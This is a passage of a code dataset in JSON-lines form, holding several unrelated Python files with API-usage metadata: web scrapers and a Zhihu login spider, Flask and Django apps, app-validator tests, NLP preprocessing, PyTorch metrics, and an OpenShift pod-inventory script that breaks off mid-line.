__name__ == '__main__':\n main()\n", "sub_path": "scrapper.py", "file_name": "scrapper.py", "file_ext": "py", "file_size_in_byte": 9989, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 14, "usage_type": "attribute"}, {"api_name": "requests.codes", "line_number": 15, "usage_type": "attribute"}, {"api_name": "requests.codes", "line_number": 16, "usage_type": "attribute"}, {"api_name": "requests.codes", "line_number": 17, "usage_type": "attribute"}, {"api_name": "requests.utils.default_headers", "line_number": 35, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 42, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 114, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 127, "usage_type": "call"}, {"api_name": "pymysql.cursors.connect", "line_number": 137, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 137, "usage_type": "name"}, {"api_name": "config.conf.user", "line_number": 138, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 138, "usage_type": "name"}, {"api_name": "config.conf.password", "line_number": 139, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 139, "usage_type": "name"}, {"api_name": "pymysql.cursors.cursors", "line_number": 142, "usage_type": "attribute"}, {"api_name": "pymysql.cursors", "line_number": 142, "usage_type": "name"}, {"api_name": "pymysql.cursors.connect", "line_number": 146, "usage_type": "call"}, {"api_name": "pymysql.cursors", "line_number": 146, "usage_type": "name"}, {"api_name": "config.conf.user", "line_number": 147, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 147, "usage_type": "name"}, {"api_name": "config.conf.password", "line_number": 148, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 148, "usage_type": "name"}, {"api_name": "pymysql.cursors.cursors", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pymysql.cursors", "line_number": 150, "usage_type": "name"}, {"api_name": "config.conf.api_key", "line_number": 217, "usage_type": "attribute"}, {"api_name": "config.conf", "line_number": 217, "usage_type": "name"}, {"api_name": "requests.request", "line_number": 220, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 222, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 234, "usage_type": "call"}]} +{"seq_id": "127805288", "text": "import json\n\nfrom appvalidator import validate_app, validate_packaged_app\nfrom helper import safe\n\n\n@safe\ndef test_webapp_new():\n \"\"\"Test that webapps can be validated with the new api.\"\"\"\n with open(\"tests/resources/testwebapp.webapp\") as file_:\n out = validate_app(file_.read())\n j = json.loads(out)\n assert j[\"success\"], \"Expected not to fail\"\n\n\n@safe\ndef test_packaged_app_new():\n \"\"\"Test that packaged apps can be validated with the new api.\"\"\"\n out = validate_packaged_app(\"tests/resources/packaged_app.zip\",\n listed=False)\n j = json.loads(out)\n assert j[\"success\"], \"Expected not to fail\"\n\n\n@safe\ndef test_packaged_app_bundle():\n \"\"\"Test that packaged apps can be validated with the new api.\"\"\"\n out = validate_packaged_app(\"tests/resources/packaged_app.zip\",\n listed=False, format=None)\n assert out.get_resource(\"packaged\")\n", "sub_path": "tests/test_validate.py", "file_name": "test_validate.py", "file_ext": "py", "file_size_in_byte": 934, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "appvalidator.validate_app", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 12, "usage_type": "call"}, {"api_name": "helper.safe", "line_number": 7, "usage_type": "name"}, {"api_name": "appvalidator.validate_packaged_app", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}, {"api_name": "helper.safe", "line_number": 16, "usage_type": "name"}, {"api_name": "appvalidator.validate_packaged_app", "line_number": 28, "usage_type": "call"}, {"api_name": "helper.safe", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "20888779", "text": "from requests import Session\nimport re\nimport random\nimport urllib.parse\n\nclass SpiderLogin(object):\n # 构造-------------------\n def __init__(self):\n # 会话\n self.session = None\n\n self.mainURL = 'https://www.zhihu.com'\n self.login_url = self.mainURL + '/login/email'\n self.login_data = {\n 'email': '1756563255@qq.com',\n 'password': '***',\n 'rememberme': 'true'\n }\n\n self.headers_base = {\n 'X-Requested-With': 'XMLHttpRequest',\n 'Referer': 'http://www.zhihu.com',\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; '\n 'rv:39.0) Gecko/20100101 Firefox/39.0',\n 'Host': 'www.zhihu.com'\n }\n\n def get_xsrf(self, url=None):\n page = self.session.get(url, verify=False)\n # print (page.text)\n xsrf = re.search('.*?', page.text)\n # print xsrf.group(1)\n if xsrf == None:\n return ''\n else:\n return xsrf.group(1)\n\n def login(self):\n self.session = Session()\n\n # 获取 xsrf\n xsrf = self.get_xsrf('https://www.zhihu.com/#signin')\n self.login_data['_xsrf'] = xsrf.encode('utf-8')\n\n # 获取验证码\n captcha_url = 'https://www.zhihu.com/captcha.gif'\n params = {'r': random.random(), 'type': 'login'}\n r = self.session.get(captcha_url + '?' + urllib.parse.urlencode(params), verify=True)\n # head = r.request.headers\n # print head\n open('captcha.gif', 'wb').write(r.content)\n print(u'请输入验证码')\n captcha_str = input()\n self.login_data['captcha'] = captcha_str\n\n #\n response = self.session.post(self.login_url, headers=self.headers_base, data=self.login_data, verify=True)\n print(\"--------------response-----------\\n\", response)\n print(\"status code: \", response.status_code)\n print(response.cookies)\n # print(response.text) #登陆后的个人页面\n print(\"----------------------------------\")\n\n return self.session\n\nif __name__==\"__main__\":\n SpiderLogin().login()\n", "sub_path": "spider_login.py", "file_name": "spider_login.py", "file_ext": "py", "file_size_in_byte": 2198, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.search", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 39, "usage_type": "call"}, {"api_name": "random.random", "line_number": 47, "usage_type": "call"}, {"api_name": "urllib.parse.parse.urlencode", "line_number": 48, "usage_type": "call"}, {"api_name": "urllib.parse.parse", "line_number": 48, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 48, "usage_type": "name"}]} +{"seq_id": "408596876", "text": "import os\nimport cv2\nimport copy\nimport sys\nimport time\nfrom ctypes import windll, Structure, c_long, byref\nimport json\n\ndef convert_frame_to_time(frame):\n return float(float(frame) / 30.0)\n\n\nclass POINT(Structure):\n _fields_ = [(\"x\", c_long), (\"y\", c_long)]\n\n\ndef queryMousePosition():\n pt = POINT()\n windll.user32.GetCursorPos(byref(pt))\n return 1 - pt.y/1151\n\n\ndef main(match_to_process, score_output_path):\n score = []\n cap = cv2.VideoCapture(match_to_process)\n current_frame = 0\n while cap.isOpened():\n current_frame += 1\n ret, frame = cap.read()\n if ret is True:\n time_frame = convert_frame_to_time(current_frame - 10)\n cv2.imshow('view', frame)\n key = cv2.waitKey(0)\n if key & 0xFF == ord('w'):\n pos = queryMousePosition()\n if current_frame < 10:\n continue\n score.append([time_frame, pos])\n print(pos)\n time.sleep(0.03)\n continue\n if ret is False:\n cap.release()\n with open(score_output_path, 'w') as output:\n json.dump(score, output)\n\nif __name__ == \"__main__\":\n main('C:\\\\Users\\\\patin_000\\\\source\\\\repos\\\\DSP\\\\Broadcasts\\\\325392389\\\\match7.mp4', 'C:\\\\Users\\\\patin_000\\\\source\\\\repos\\\\DSP\\\\TensorflowData\\\\Unprocessed\\\\325392389_match7.txt')\n #main(sys.argv[1], sys.argv[2])\n", "sub_path": "Scripts/TrainingDataGenerator.py", "file_name": "TrainingDataGenerator.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "ctypes.Structure", "line_number": 13, "usage_type": "name"}, {"api_name": "ctypes.c_long", "line_number": 14, "usage_type": "name"}, {"api_name": "ctypes.windll.user32.GetCursorPos", "line_number": 19, "usage_type": "call"}, {"api_name": "ctypes.windll.user32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "ctypes.windll", "line_number": 19, "usage_type": "name"}, {"api_name": "ctypes.byref", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 33, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "61096039", "text": "from flask import Flask, render_template, request\nfrom repo_find import get\n\napp = Flask(__name__)\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/list\", methods=[\"GET\"])\ndef get_my_list():\n org = request.args.get(\"org\")\n n = request.args.get(\"N\")\n m = request.args.get(\"M\")\n page_no = request.args.get(\"page_no\", \"1\")\n\n if(int(n) <= 0 or int(m) < 0):\n return \"There is an error with organization or one of the values of n or m is not positive\"\n\n repos, next_page_link, previous_page_link = get(org, int(n), int(m), page_no)\n org_name = str(org)\n\n if repos == \"404\":\n return \"There is an error with organization or one of the values of n or m is not positive\"\n return render_template(\n \"repo_list.html\",\n repos=repos,\n org=org_name.upper(),\n next_page_link=next_page_link,\n previous_page_link=previous_page_link,\n )\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1004, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 14, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 14, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 15, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 16, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 17, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 17, "usage_type": "name"}, {"api_name": "repo_find.get", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "443901282", "text": "from django.urls import path\nfrom information import views\n\nurlpatterns = [\n path('newsinfo/', views.NewsList.as_view()),\n path('newsinfoList/', views.newsinfoList),\n\n\n path('dustinfo/', views.DustList.as_view()),\n path('dustinfoList/', views.dustinfoList),\n path('dustliveinfo/', views.dustliveinfo),\n\n\n path('WeatherNotice/', views.WeatherNotice.as_view()),\n path('WeathernoticeList/', views.WeathernoticeList),\n\n\n path('weatherinfo/', views.WeatherList.as_view()),\n path('weatherinfoList/', views.weatherinfoList),\n path('weatherliveinfo/', views.weatherliveinfo),\n \n path('rainraderinfo/', views.rainraderinfo),\n path('sickinfo/', views.SickList),\n path('buginfo/', views.BugList),\n]\n\n", "sub_path": "projectback/information/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 731, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "information.views.NewsList.as_view", "line_number": 5, "usage_type": "call"}, {"api_name": "information.views.NewsList", "line_number": 5, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 5, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "information.views.newsinfoList", "line_number": 6, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "information.views.DustList.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "information.views.DustList", "line_number": 9, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "information.views.dustinfoList", "line_number": 10, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "information.views.dustliveinfo", "line_number": 11, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "information.views.WeatherNotice.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "information.views.WeatherNotice", "line_number": 14, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "information.views.WeathernoticeList", "line_number": 15, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "information.views.WeatherList.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "information.views.WeatherList", "line_number": 18, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "information.views.weatherinfoList", "line_number": 19, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "information.views.weatherliveinfo", "line_number": 20, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "information.views.rainraderinfo", "line_number": 22, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "information.views.SickList", "line_number": 23, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "information.views.BugList", "line_number": 24, "usage_type": "attribute"}, {"api_name": "information.views", "line_number": 24, "usage_type": "name"}]} +{"seq_id": "3511909", "text": "from django.shortcuts import render, HttpResponse, redirect\nfrom .forms import *\nfrom .models import *\nfrom django.contrib import messages\n\n\ndef index(request):\n form = NameForm()\n return render(request, 'index.html', {\"form1\":form})\n\ndef home(request):\n if request.method==\"POST\":\n obj = StudentForm(request.POST,request.FILES)\n if obj.is_valid():\n obj.save()\n messages.success(request,\"Student Data Inserted.\")\n return redirect('show')\n else:\n return HttpResponse(\"ERROR\") \n studentform = StudentForm()\n return render(request,'student.html', {\"student\":studentform})\n\ndef showdata(request):\n data = Student.objects.all()\n return render(request, 'show.html',{\"students\":data})\n\ndef deletestudent(request,id):\n obj = Student.objects.get(id=id)\n print(obj)\n obj.delete()\n messages.success(request,\"Student Data Deleted.\")\n return redirect('show')\n\ndef updatestudent(request,id):\n student = Student.objects.get(id=id)\n if request.method == 'POST': \n form = StudentForm(request.POST, request.FILES , instance = student) \n if form.is_valid(): \n form.save() \n messages.success(request,'Student Updated!!!!!!!')\n return redirect(\"/show\") \n return render(request, 'updatestudent.html',{'data':student})\n\n\ndef searchstudent(request):\n name = request.POST['searchtext']\n data = Student.objects.filter(name__icontains=name)\n return render(request, 'show.html',{\"students\":data})", "sub_path": "formproject/form/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1543, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 17, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 32, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 40, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "496505210", "text": "# Because I was too lazy to create separate data tables, this is a file \n# to transform the dataframe containing our information into different forms\n\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords #For stopwords\nimport numpy as np\n\nstop_words_nltk = stopwords.words('english')\n#stop_words = [\"the\",\"it\",\"she\",\"he\", \"a\"] #Uncomment this line if you want to use your own list of stopwords.\n\n#The stemmers and lemmers need to be initialized before bing run\nporter = nltk.stem.porter.PorterStemmer()\nsnowball = nltk.stem.snowball.SnowballStemmer('english')\nwordnet = nltk.stem.WordNetLemmatizer()\n\ndef normlizeTokens(tokenLst, stopwordLst = None, stemmer = None, lemmer = None):\n #We can use a generator here as we just need to iterate over it\n\n #Lowering the case and removing non-words\n workingIter = (w.lower() for w in tokenLst if w.isalpha())\n\n #Now we can use the semmer, if provided\n if stemmer is not None:\n workingIter = (stemmer.stem(w) for w in workingIter)\n \n #And the lemmer\n if lemmer is not None:\n workingIter = (lemmer.lemmatize(w) for w in workingIter)\n \n #And remove the stopwords\n if stopwordLst is not None:\n workingIter = (w for w in workingIter if w not in stopwordLst)\n #We will return a list with the stopwords removed\n return list(workingIter)\n\ndef get_clean_data():\n '''\n '''\n data = pd.read_pickle('top_posts831.pkl')\n df = data.drop_duplicates(['com_id'], keep = 'first').set_index('com_id')\n df = df.loc[:,['sub_text','com_text','com_delta_received', 'com_delta_from_op', 'com_upvotes']]\n df['com_delta_from_op']= df['com_delta_from_op'].apply(lambda x: False if x==None else x==True)\n\n df.dropna(axis=0, how='any', inplace = True)\n df = df[(df['com_text']!='[deleted]')&(df['com_text']!='[removed]')]\n\n return(df)\n\ndf = get_clean_data()\ndf['tokenized_com'] = df['com_text'].apply(lambda x: nltk.word_tokenize(x))\ndf['normalized_com'] = df['tokenized_com'].apply(lambda x: normlizeTokens(x, stopwordLst = stop_words_nltk, stemmer = snowball))\n\ndf['tokenized_sub'] = df['sub_text'].apply(lambda x: nltk.word_tokenize(x))\ndf['normalized_sub'] = df['tokenized_sub'].apply(lambda x: normlizeTokens(x, stopwordLst = stop_words_nltk, stemmer = snowball))\n\ndf.to_pickle(\"cmv_data.pkl\")\n \n\n", "sub_path": "transform_df.py", "file_name": "transform_df.py", "file_ext": "py", "file_size_in_byte": 2321, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "nltk.corpus.stopwords.words", "line_number": 9, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 9, "usage_type": "name"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 13, "usage_type": "call"}, {"api_name": "nltk.stem", "line_number": 13, "usage_type": "attribute"}, {"api_name": "nltk.stem.snowball.SnowballStemmer", "line_number": 14, "usage_type": "call"}, {"api_name": "nltk.stem", "line_number": 14, "usage_type": "attribute"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.stem", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 40, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 51, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "508296318", "text": "from sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score\nfrom ..utils.decorators import make_deprecated\n\nimport trixi\n\nfrom delira import get_backends\n\nif \"TORCH\" in get_backends():\n import torch\n\n from .train_utils import pytorch_tensor_to_numpy, float_to_pytorch_tensor \n @make_deprecated(trixi)\n class AurocMetricPyTorch(torch.nn.Module):\n \"\"\"\n Metric to Calculate AuROC\n\n .. deprecated:: 0.1\n :class:`AurocMetricPyTorch` will be removed in next release and is\n deprecated in favor of ``trixi.logging`` Modules\n\n .. warning::\n :class:`AurocMetricPyTorch` will be removed in next release\n\n \"\"\"\n def __init__(self):\n super().__init__()\n\n def forward(self, outputs: torch.Tensor, targets: torch.Tensor):\n \"\"\"\n Actual AuROC calculation\n\n Parameters\n ----------\n outputs : torch.Tensor\n predictions from network\n targets : torch.Tensor\n training targets\n\n Returns\n -------\n torch.Tensor\n auroc value\n\n \"\"\"\n if outputs.dim() == 2:\n outputs = torch.argmax(outputs, dim=1)\n score = roc_auc_score(pytorch_tensor_to_numpy(targets),\n pytorch_tensor_to_numpy(outputs))\n return float_to_pytorch_tensor(score)\n\n\n @make_deprecated(trixi)\n class AccuracyMetricPyTorch(torch.nn.Module):\n \"\"\"\n Metric to Calculate Accuracy\n \n .. deprecated:: 0.1\n :class:`AccuracyMetricPyTorch` will be removed in next release and is\n deprecated in favor of ``trixi.logging`` Modules\n\n .. warning::\n class:`AccuracyMetricPyTorch` will be removed in next release\n\n \"\"\"\n def __init__(self, normalize=True, sample_weight=None):\n \"\"\"\n\n Parameters\n ----------\n normalize : bool, optional (default=True)\n If ``False``, return the number of correctly classified samples.\n Otherwise, return the fraction of correctly classified samples.\n\n sample_weight : array-like of shape = [n_samples], optional\n Sample weights.\n\n \"\"\"\n super().__init__()\n self.normalize = normalize\n self.sample_weight = sample_weight\n\n def forward(self, outputs: torch.Tensor, targets: torch.Tensor):\n \"\"\"\n Actual accuracy calcuation\n\n Parameters\n ----------\n outputs : torch.Tensor\n predictions from network\n targets : torch.Tensor\n training targets\n\n Returns\n -------\n torch.Tensor\n accuracy value\n\n \"\"\"\n outputs = outputs > 0.5\n if outputs.dim() == 2:\n outputs = torch.argmax(outputs, dim=1)\n score = accuracy_score(pytorch_tensor_to_numpy(targets),\n pytorch_tensor_to_numpy(outputs),\n self.normalize, self.sample_weight)\n return float_to_pytorch_tensor(score)\n", "sub_path": "delira/training/metrics.py", "file_name": "metrics.py", "file_ext": "py", "file_size_in_byte": 3270, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "delira.get_backends", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 48, "usage_type": "call"}, {"api_name": "train_utils.pytorch_tensor_to_numpy", "line_number": 48, "usage_type": "call"}, {"api_name": "train_utils.pytorch_tensor_to_numpy", "line_number": 49, "usage_type": "call"}, {"api_name": "train_utils.float_to_pytorch_tensor", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.decorators.make_deprecated", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 103, "usage_type": "call"}, {"api_name": "train_utils.pytorch_tensor_to_numpy", "line_number": 103, "usage_type": "call"}, {"api_name": "train_utils.pytorch_tensor_to_numpy", "line_number": 104, "usage_type": "call"}, {"api_name": "train_utils.float_to_pytorch_tensor", "line_number": 106, "usage_type": "call"}, {"api_name": "utils.decorators.make_deprecated", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "175802733", "text": "from flask import flash, redirect, url_for\nfrom app import db\nfrom app.admin import bp\nfrom app.models import Parent, Student, Teacher\n\n\n@bp.route('/profile/parent//delete-account')\ndef delete_parent_account(username):\n parent = Parent.query.filter_by(username=username).first_or_404()\n db.session.delete(parent)\n db.session.commit()\n flash(f'Your parent account {parent.username} was successfully deleted')\n return redirect(url_for('main.home'))\n\n\n@bp.route('/profile/student//delete-account')\ndef delete_student_account(username):\n student = Student.query.filter_by(username=username).first_or_404()\n db.session.delete(student)\n db.session.commit()\n flash(f'Your student account {student.username} was successfully deleted')\n return redirect(url_for('main.home'))\n\n\n@bp.route('/profile/teacher//delete-account')\ndef delete_teacher_account(username):\n teacher = Teacher.query.filter_by(username=username).first_or_404()\n db.session.delete(teacher)\n db.session.commit()\n flash(f'Your teacher account {teacher.username} was successfully deleted')\n return redirect(url_for('main.home'))\n", "sub_path": "version1/app/admin/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 1160, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "app.models.Parent.query.filter_by", "line_number": 9, "usage_type": "call"}, {"api_name": "app.models.Parent.query", "line_number": 9, "usage_type": "attribute"}, {"api_name": "app.models.Parent", "line_number": 9, "usage_type": "name"}, {"api_name": "app.db.session.delete", "line_number": 10, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 10, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 10, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 11, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 11, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 11, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 13, "usage_type": "call"}, {"api_name": "app.admin.bp.route", "line_number": 7, "usage_type": "call"}, {"api_name": "app.admin.bp", "line_number": 7, "usage_type": "name"}, {"api_name": "app.models.Student.query.filter_by", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models.Student.query", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.models.Student", "line_number": 18, "usage_type": "name"}, {"api_name": "app.db.session.delete", "line_number": 19, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 19, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 20, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 22, "usage_type": "call"}, {"api_name": "app.admin.bp.route", "line_number": 16, "usage_type": "call"}, {"api_name": "app.admin.bp", "line_number": 16, "usage_type": "name"}, {"api_name": "app.models.Teacher.query.filter_by", "line_number": 27, "usage_type": "call"}, {"api_name": "app.models.Teacher.query", "line_number": 27, "usage_type": "attribute"}, {"api_name": "app.models.Teacher", "line_number": 27, "usage_type": "name"}, {"api_name": "app.db.session.delete", "line_number": 28, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 28, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 29, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 31, "usage_type": "call"}, {"api_name": "app.admin.bp.route", "line_number": 25, "usage_type": "call"}, {"api_name": "app.admin.bp", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "404530889", "text": "import kubernetes, sys\nfrom openshift.dynamic import DynamicClient\nimport urllib3\nurllib3.disable_warnings()\n\napi_key = sys.argv[1]\ntmp_output = \"/tmp/ccit-teams-tenants.txt\"\nskip_projects = list()\nwith open(tmp_output) as f:\n teams_tenants = list(f)\n\nconfiguration = kubernetes.client.Configuration()\nconfiguration.api_key = {'authorization': 'Bearer {}'.format(api_key)}\nconfiguration.host = 'https://paas.psi.redhat.com:443'\nconfiguration.verify_ssl = False\nkubernetes.client.Configuration.set_default(configuration)\nk8s_client = kubernetes.client.ApiClient(configuration)\ndyn_client = DynamicClient(k8s_client)\nv1_projects = dyn_client.resources.get(api_version='project.openshift.io/v1', kind='Project')\nprojects = v1_projects.get()\nv1_templates = dyn_client.resources.get(api_version='template.openshift.io/v1',\n kind='Template', singular_name='template')\nv1_pods = dyn_client.resources.get(api_version='v1', kind='Pod')\n\ninventory = dict()\nfor project in projects.items:\n if project.metadata.name.startswith('jenkins-csb-'):\n pods = v1_pods.get(namespace=project.metadata.name)\n for pod in pods.items:\n if pod.status.phase == 'Failed':\n if project.metadata.name not in inventory.keys():\n 